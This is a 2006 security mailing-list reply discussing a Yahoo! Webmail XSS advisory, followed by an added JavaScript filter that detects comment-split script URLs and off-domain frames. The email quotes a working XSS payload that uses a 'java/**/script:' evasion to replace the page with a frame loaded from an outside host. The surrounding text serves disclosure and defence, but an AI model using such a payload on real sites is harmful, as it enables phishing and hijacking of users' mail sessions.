Message-ID: <20060418151857.84246.qmail@web54410.mail.yahoo.com>
Date: Tue Apr 18 16:19:04 2006
From: cesarc56 at yahoo.com (Cesar)
Subject: [Argeniss] Alert - Yahoo! Webmail XSS

I know what a frame is, but if I forget I know that
you will be there to remind me, thanks.

If you look at the extract of the exploit:
-----------------------------------
(java/**/script:document.write('<frameset cols=100%
rows=100% border=0 frameboarder=0framespacing=0><frame
frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

You can see that the whole HTML document is replaced
after the "document.write" and the frameset only
references a URL that is not under the Yahoo! domain.
This means that all displayed content will be from an
external domain. I wonder if web browsers could do
something to alert about this and not just display the
external URL on the status bar. This default browser
behaviour makes phishing a lot easier.



Cesar.

--- Thierry Zoller <Thierry@...ler.lu> wrote:

> Dear Cesar Cesar,
> 
> 
> C> for a couple of seconds a weird URL, address bar
> C> didn't change (MS please change this behaviour!), but
> You know what a Frame is do you? All browsers display the source of
> the html page in the URL bar, not the source of the frame(s).
> 
> -- 
> http://secdev.zoller.lu
> Thierry Zoller
> Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7
> 
> 
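
Added example, not part of the original post or the advisory: two checks a webmail HTML filter could run against content shaped like the extract above, one for a script scheme split by a comment (`java/**/script:`) and one for frames whose source is outside the mail domain. The function names, the trusted host argument and the host `external.example` are assumptions, and the regex tag matching stands in for a real HTML parser.

```javascript
// Reduce an attribute or url() value to the scheme a lenient parser would see:
// drop /* ... */ comments, whitespace and control characters, then lowercase.
function effectiveScheme(value) {
  const collapsed = value
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/[\s\u0000-\u001f]+/g, "")
    .toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(collapsed);
  return m ? m[1] : null;
}

// True when the value resolves to a script-executing scheme after normalization.
function isScriptUrl(value) {
  return ["javascript", "vbscript"].includes(effectiveScheme(value));
}

// Return the src of every <frame>/<iframe> whose host is neither trustedHost
// nor one of its subdomains. Handles quoted and unquoted attribute values.
function externalFrameSources(html, trustedHost) {
  const re = /<i?frame\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const found = [];
  for (const m of html.matchAll(re)) {
    const src = m[1] ?? m[2] ?? m[3];
    let host;
    try {
      // Relative URLs resolve against the trusted host and therefore pass.
      host = new URL(src, `https://${trustedHost}/`).hostname;
    } catch {
      found.push(src); // unparseable: report rather than trust
      continue;
    }
    if (host !== trustedHost && !host.endsWith("." + trustedHost)) found.push(src);
  }
  return found;
}

// Constructed sample with the same shape as the extract (hypothetical host).
const sample =
  "java/**/script:document.write('<frameset cols=100% rows=100%>" +
  "<frame frameborder=0 src=http://external.example/x/></frameset>')";

console.log(isScriptUrl(sample), externalFrameSources(sample, "yahoo.com"));
```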

